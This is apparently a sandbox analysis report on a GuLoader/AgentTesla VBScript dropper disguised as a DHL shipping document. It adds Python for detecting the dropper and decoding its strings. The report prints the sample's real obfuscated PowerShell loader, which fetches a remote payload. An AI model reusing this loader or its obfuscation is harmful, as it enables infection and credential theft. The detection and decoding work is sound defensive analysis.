Windows Analysis Report
DHL Shipping doc.vbs
Overview
General Information
Detection
AgentTesla, GuLoader
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%
Signatures
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected AgentTesla
Yara detected GuLoader
Found suspicious powershell code related to unpacking or dynamic code loading
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match
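The chain this report flags (a script host running a script from a user directory, then spawning PowerShell with a very long, obfuscated command line) can be checked against process-creation telemetry outside the sandbox. The following Python is an added example, not Joe Sandbox or Sigma code: it approximates four of the signatures above over Sysmon-style process-creation fields. The events, the 4096-character threshold and the regular expressions are constructed assumptions; the wscript command line is the one from the process tree below, and the PowerShell event reuses that tree's decoder prologue with harmless filler in place of the encoded payload.

```python
"""Heuristic re-creation of several signatures from this report over
process-creation events. Added example, not Joe Sandbox's or Sigma's code;
field names mimic Sysmon Event ID 1 and all events below are constructed."""
import re
from dataclasses import dataclass

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
SCRIPT_EXTENSIONS = (".vbs", ".vbe", ".js", ".jse", ".wsf")
USER_WRITABLE = (":\\users\\", ":\\programdata\\", "\\appdata\\")
LONG_CMDLINE = 4096  # assumed threshold for "very long command line"; tune per environment

# Traits of the decoder visible in the PowerShell command line on this page.
OBFUSCATION_PATTERNS = {
    # a method name stored in a variable and called through .Invoke: $s.$name.Invoke(
    "method name held in a variable": re.compile(r"\.\$\w+\.Invoke\("),
    # dot-sourcing a command whose name is itself a variable: . ($name) ($arg)
    "dot-sourced dynamic call": re.compile(r"\.\s*\(\s*\$\w+\s*\)\s*\(\s*\$\w+"),
    # a string assembled from fragments: $v='Substrin';$v+='g'
    "string assembled from fragments": re.compile(r"\$(\w+)\s*=\s*'[^']*'\s*;\s*\$\1\s*\+=\s*'"),
}


@dataclass
class ProcessEvent:
    pid: int
    image: str
    parent_image: str
    command_line: str


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(ev: ProcessEvent) -> list[str]:
    """Names of the heuristics this single event triggers."""
    hits = []
    image, parent = basename(ev.image), basename(ev.parent_image)
    cmd, cmd_l = ev.command_line, ev.command_line.lower()

    # approximation of the idea behind the Sigma rule "WScript or CScript Dropper":
    # a script host executing a script file that lives in a user-writable path
    if image in SCRIPT_HOSTS and any(p in cmd_l for p in USER_WRITABLE) \
            and cmd_l.rstrip().rstrip('"').endswith(SCRIPT_EXTENSIONS):
        hits.append("WScript or CScript Dropper")
    if parent in SCRIPT_HOSTS and image in SHELLS:
        hits.append("Wscript starts Powershell (via cmd or directly)")
    if len(cmd) >= LONG_CMDLINE:
        hits.append("Very long command line found")
    if image in ("powershell.exe", "pwsh.exe"):
        traits = [name for name, rx in OBFUSCATION_PATTERNS.items() if rx.search(cmd)]
        if len(traits) >= 2:  # a single trait is common in legitimate scripts
            hits.append("Suspicious powershell command line found")
    return hits


def scan(events) -> dict[int, list[str]]:
    """Map pid -> triggered heuristics, omitting events that trigger none."""
    return {ev.pid: hits for ev in events if (hits := evaluate(ev))}


# Decoder prologue as it appears in the process tree of this report.
DECODER_PROLOGUE = (
    "$Tarboosh = 1;$Ldreforvaltningen='Substrin';$Ldreforvaltningen+='g';"
    "Function Selvstarterens($Journal){$Nomadeinvasionens165=$Journal.Length-$Tarboosh;"
    "For($Effectible=5; $Effectible -lt $Nomadeinvasionens165; $Effectible+=(6))"
    "{$Lagringsformers+=$Journal.$Ldreforvaltningen.Invoke($Effectible, $Tarboosh);}"
    "$Lagringsformers;}function Spelean($Surmaster){. ($Reproduktionsteknikkens) ($Surmaster);}"
)

# Constructed events: the wscript line is the sandbox's, the PowerShell payload is filler.
SAMPLE_EVENTS = [
    ProcessEvent(6556, r"C:\Windows\System32\WScript.exe", r"C:\Windows\explorer.exe",
                 r'C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL Shipping doc.vbs"'),
    ProcessEvent(6692, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"C:\Windows\System32\WScript.exe",
                 r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "'
                 + DECODER_PROLOGUE + "$Uvelkomne=Selvstarterens '" + "filler " * 800 + "';\""),
    ProcessEvent(7100, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"C:\Windows\explorer.exe", "powershell.exe -NoProfile -Command Get-Date"),
]

if __name__ == "__main__":
    for pid, hits in scan(SAMPLE_EVENTS).items():
        print(pid, hits)
```

The parent/child check here only covers the direct wscript.exe to powershell.exe edge; the "via cmd" variant in the signature name needs the grandparent, which Sysmon Event 1 does not carry, so it has to be joined from the parent's own creation event.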
Classification
- System is w10x64
- wscript.exe (PID: 6556 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL Shipping doc.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  - powershell.exe (PID: 6692 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Tarboosh = 1;$Ldreforvaltningen='Substrin';$Ldreforvaltningen+='g';Function Selvstarterens($Journal){$Nomadeinvasionens165=$Journal.Length-$Tarboosh;For($Effectible=5; $Effectible -lt $Nomadeinvasionens165; $Effectible+=(6)){$Lagringsformers+=$Journal.$Ldreforvaltningen.Invoke($Effectible, $Tarboosh);}$Lagringsformers;}function Spelean($Surmaster){. ($Reproduktionsteknikkens) ($Surmaster);}$Uvelkomne=Selvstarterens 'PlummMSk ul oPolerz ,oliliOvul albestylvi .uiagen.e/ Bat.e5Vand p. ouse0Ba s,e Nove(A ntipW nyre i A.jenPrv .tdA.auaoA flgnw refo sPulve Sty ,kNPlyssTD ds y Super 1 Renl0Ove rb.Weste0b ned; catu LivreWAcq ueiSpeaknM yo,o6ran e 4 Sn g;Lut he Kintx r ose6Photo4 Bef t; odk e AlgerrPi mpsv Feis: nge1Eryth 2South1 Ov er.Flag 0F ,rce)debug AmeriG ,a rseRotuncF loppkKokle ofysio/kop if2Konom0T ipti1Lag.r 0Kalku0Opr et1S ksk0 A.cu1Unspr turbFstfr oiImpe.rWh or.eMa sif Unid,oLand .xNonf /Do ket1Sikke2 vrang1 Dec i.Mesom0 L ,ee ';$Yellowfish=Selvstarterens 'G undU DimmosAfli re,onharIn cel- FradA D.utog R.c oe.orksn,e rdetHalen ';$Ellokomotiv242=Selvstarterens 'Falkeh elvetAdmi rtSyge.pny anls Th.n: Tugt / Lep i/A.pasdSb r dr Anchi s kkevSupe reFo.tm.Br easgRarefo Fonlo Bag eg CapslBe foreAlkoh. Granic,ejr soRecemmpl ate/ Vasku TeknocR.ll o?ItczeeRe scuxElevap VulsoUd,k arDermatIn si=Epilod CrampoLuks uw BortnT rmilAphelo Ne gaa dto ed cams&No nadi Glumd Noi.e=Amil l1Skrivx Q uinC .nsvK Kv.kkBro. hDSlovaLG nerKPupilk thuriBoat lJmortagHy droTkr,ptC sla p2Fips kNV ndu2Aa nds8Helleh druesjCath olSlagt0U tral ask1d et,c9Intru ULiderbAqu avuStenbxS l.ndJShove 6 Avisw Su bc9Overt ';$intersessional=Selvstarterens ' Stal>T idsd ';$Reproduktionsteknikkens=Selvstarterens 'By gniiCha me T.okx ,ne d ';$Guiding='Scop124';Spelean (Selvstarterens 'Vi rksSRiddee JointtStav e-Smr.aCFa rmeoCastrn RegistFirm aeMilten G .vetProev F,dst- ver P JubbaPer iotKrlhahT vrsk Forea T,econ:For ma\nedb,B BromiColle s pre i.ho todSand,dH ydraeSt,mm r Ho,neha, mon.sthe.U nurnt ilat xCo tatAlc on Sylve-F u,daV B.gs aindbelapp aruAars eS abi Ammo,$ P,atrG Non ruSo ediEx tradSrgeri RabunB is sgSigna;Sp e l ');Spelean (Selvstarterens ' .nneiJa ve,fDeleg Nonn(Frit. t TekseSoc rasLuft.tD ani,-Bead. pBalm,aQui ritfi.enhO lymp Nonna TAton,:Dec hi\ AadsB rakiiPrede sHektai Pj atdSkrendp recieUund. rVolleeBre snEquip.E genpt ashl xEnsilt,he re) ultr{ TromeGunna xPe muiGem entS,gne}E thno;Homes ');$Dilamination = Selvstarterens 'Yunp e Buttcko nkahTkkeso Neden Koma r% amma .a lvpErratpI ndhadKolle aMesmetAar boaParap%K onsu\Canto AObfuspBau xit rsenyT
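The Selvstarterens function in the PowerShell command line above is the entire string obfuscation: with $Tarboosh = 1 it calls Substring($i, 1) for $i = 5, 11, 17, ... while $i is less than Length - 1, so each real character sits behind five junk characters and one junk character trails the string (drop that trailing character and the decoder silently loses the last real one). The Python below is an added example, not code from the sample or from the report. It ports the loop, pulls every Selvstarterens '...' call out of a command line and decodes it; the encoder, the sample command line, its example.com URL and the Invoke-WebRequest plaintext are constructed so the expected output is known, and the decoder name is a parameter because it changes per sample.

```python
"""Port of the GuLoader-style string decoder seen in the command line above
(every sixth character from index 5, stopping before the last character).
Added example, not the sample's or the report's code; the sample command
line built here is constructed."""
import random
import re

FIRST = 5    # $Effectible = 5
STRIDE = 6   # $Effectible += (6)
JUNK = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ ,."


def selvstarterens(journal: str) -> str:
    """for ($i = 5; $i -lt $s.Length - 1; $i += 6) { $out += $s.Substring($i, 1) }"""
    limit = len(journal) - 1          # $Journal.Length - $Tarboosh, with $Tarboosh = 1
    return "".join(journal[i] for i in range(FIRST, limit, STRIDE))


def encode(plain: str, rng: random.Random) -> str:
    """Inverse of selvstarterens, used only to build constructed test data."""
    pieces = []
    for ch in plain:
        pieces.append("".join(rng.choice(JUNK) for _ in range(STRIDE - 1)))
        pieces.append(ch)
    pieces.append(rng.choice(JUNK))   # trailing junk that the decoder's bound skips
    return "".join(pieces)


def decode_command_line(cmd: str, decoder: str):
    """Decode every <decoder> '<encoded>' call in a command line.

    Returns (assignments, statements): strings assigned to a variable
    ($Var=<decoder> '...') and strings handed straight to the executor
    function (Spelean (<decoder> '...')). Assumes the encoded strings
    contain no single quote, which matches the strings on this page.
    """
    rx = re.compile(r"(?:\$(\w+)\s*=\s*)?" + re.escape(decoder) + r"\s*'([^']*)'")
    assignments, statements = {}, []
    for var, enc in rx.findall(cmd):
        dec = selvstarterens(enc)
        if var:
            assignments[var] = dec
        else:
            statements.append(dec)
    return assignments, statements


def build_sample(seed: int = 7) -> str:
    """A constructed command line in the same shape as the one in the tree above."""
    rng = random.Random(seed)
    ua = encode("Mozilla/5.0 (Windows NT 10.0; Win64; x64)", rng)
    url = encode("https://example.com/stage2.bin", rng)   # example.com placeholder, not an IOC
    cmdlet = encode("Invoke-WebRequest", rng)
    stmt = encode("$Blob = & $Cmdlet -Uri $Url -UserAgent $Ua", rng)
    return ("$Ua=Selvstarterens '" + ua + "';$Url=Selvstarterens '" + url + "';"
            "$Cmdlet=Selvstarterens '" + cmdlet + "';Spelean (Selvstarterens '" + stmt + "');")


if __name__ == "__main__":
    names, stmts = decode_command_line(build_sample(), "Selvstarterens")
    for var, value in names.items():
        print(f"${var} = {value}")
    for s in stmts:
        print("executed:", s)
```

Against a real command line, pass the sample's own decoder name and feed the output of each decoded statement back through the same function, since later stages are usually built from the variables decoded earlier; strings assigned to the variable that Spelean dot-sources tell you which command actually executes the decoded text.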